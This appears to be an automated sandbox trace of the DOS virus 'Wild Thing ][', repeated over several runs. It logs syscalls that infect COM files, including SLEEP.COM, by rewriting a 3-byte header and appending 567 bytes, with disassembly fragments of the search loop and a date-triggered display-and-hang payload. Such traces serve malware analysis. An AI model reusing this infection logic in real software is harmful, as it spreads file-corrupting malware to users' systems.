2018-12-25T12:42:08.726166598Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.727317432Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.729413503Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.731511779Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.737635808Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.738938126Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.744471211Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.750910798Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.752812279Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.75732857Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.765791078Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.7732544Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.775411778Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.780163195Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.781384979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.783933929Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.78538792Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.791723716Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.793466437Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.799030768Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.810411508Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.81410279Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.820870689Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.832000057Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.845678883Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.848026026Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.855792118Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.858094981Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.867165422Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.878427003Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.881494141Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.887557609Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.889532522Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.890821384Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.900830242Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:08.117654515Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:08.121072983Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:08.123309567Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:08.126110565Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:08.128503943Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:08.135109226Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:08.143071825Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:08.155315428Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.170780656Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.177378012Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.178748413Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.199383217Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.200766773Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.203236569Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.206416289Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.214597777Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.216215381Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.22433761Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.230797888Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.232656124Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.23689751Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.247113101Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.258539891Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.260531665Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.267093947Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.26850512Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.272571738Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.274632564Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.281391204Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.283383778Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.291407414Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.311408558Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.314338673Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.320229398Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.330443742Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.337967548Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.339626421Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.346400279Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.347845895Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.350745961Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.352588429Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.361557179Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.364628348Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.372791753Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.383200054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.387499177Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.393750063Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.404694843Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.412890362Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.414868647Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.421842921Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.42460512Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.427996361Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.430076058Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.439060809Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.441400312Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.449267391Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.460005352Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.46314535Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.46971792Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.479825264Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.487128019Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.488973753Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.495748022Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.4976335Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.500192962Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.50197889Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.510316495Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.51200099Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.520511322Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.530931468Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.534712303Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.540406003Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.550670332Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.557417832Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.55910224Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.565909048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.567578478Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.570673624Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.573397575Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.582388843Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.584124259Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.592748132Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.603424596Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.606264438Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.613005909Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.623308563Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.629816022Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.632211672Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.638457167Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.639679547Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.642744902Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.644242355Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.652424017Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.655374715Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.662959778Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.673150137Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.676777541Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.682689994Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.692753601Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.70036495Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.702101539Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.708692846Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.711396203Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.718583307Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.731195619Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.735064261Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.73934687Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.741036986Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.7428384Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.752853871Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:08.776305428Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:08.777922854Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:08.780414549Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:08.783357756Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:08.785799478Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:08.791888676Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:08.802505059Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:08.808757534Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.824863493Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.831274318Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.832588944Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.857663234Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.859333134Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.86208083Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.864808534Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.873314781Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.874841635Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.882930833Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.892799726Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.896124799Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.914779786Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.927245574Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.938336296Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.93997974Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.947616624Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.949254176Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.952377566Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.96432288Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.972612151Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.974368981Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.98430317Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.994165054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.996990029Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.004127379Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.014009927Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.035554657Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.038162475Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.04450852Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.045965697Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.04956879Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.051251906Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.059334684Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.061604836Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.07301515Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.083008626Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.086153848Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.091692544Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.101774807Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.109002673Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.111062381Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.117520632Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.119088817Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.122785355Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.124723101Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.134642836Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.141316511Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.14888778Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.160715319Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.16397593Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.169911318Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.17985897Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.187292429Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.188913594Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.19536297Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.197439826Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.200751213Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.202665388Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.211695625Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.213122242Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.223339493Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.235191036Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.237654554Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.243057992Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.253698005Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.261205773Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.262593718Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.269567092Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.271126983Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.273893256Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.276348973Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.285215836Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.28677787Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.295628402Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.305445531Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.307915941Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.314365292Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.324110902Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.330547196Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.332686475Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.339204223Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.341195137Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.344243062Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.346220185Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.354226852Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.356754661Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.364588219Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.37437554Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.377472841Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.38365326Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.39329634Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.400214425Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.401907743Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.40827451Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.410075505Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.420615769Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.430938302Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.433484016Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.438104778Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.440043037Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.441344182Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.44977721Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.014988109Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.017639153Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.021823711Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.02466579Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.027683877Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.033944826Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.045618793Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.057565586Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.074226099Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.081027838Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.082633744Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.091139459Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.093086304Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.095909583Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.100862426Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.109117582Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.110917702Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.119460889Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.130836178Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.133449439Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.13965116Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.163142995Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.169760501Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.171111306Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.178254435Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.179907979Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.182778995Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.185507147Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.194127114Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.195830882Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.204052528Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.214068526Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.217132006Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.223931877Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.233553721Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.24037284Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.243072063Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.249988629Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.25162492Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.254845263Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.256529967Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.264915846Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.267279792Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.274734715Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.285032044Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.287729501Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.29387998Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.303349388Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.314713361Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.316867447Z 63 PC: 12bad | Read file or device (See above)
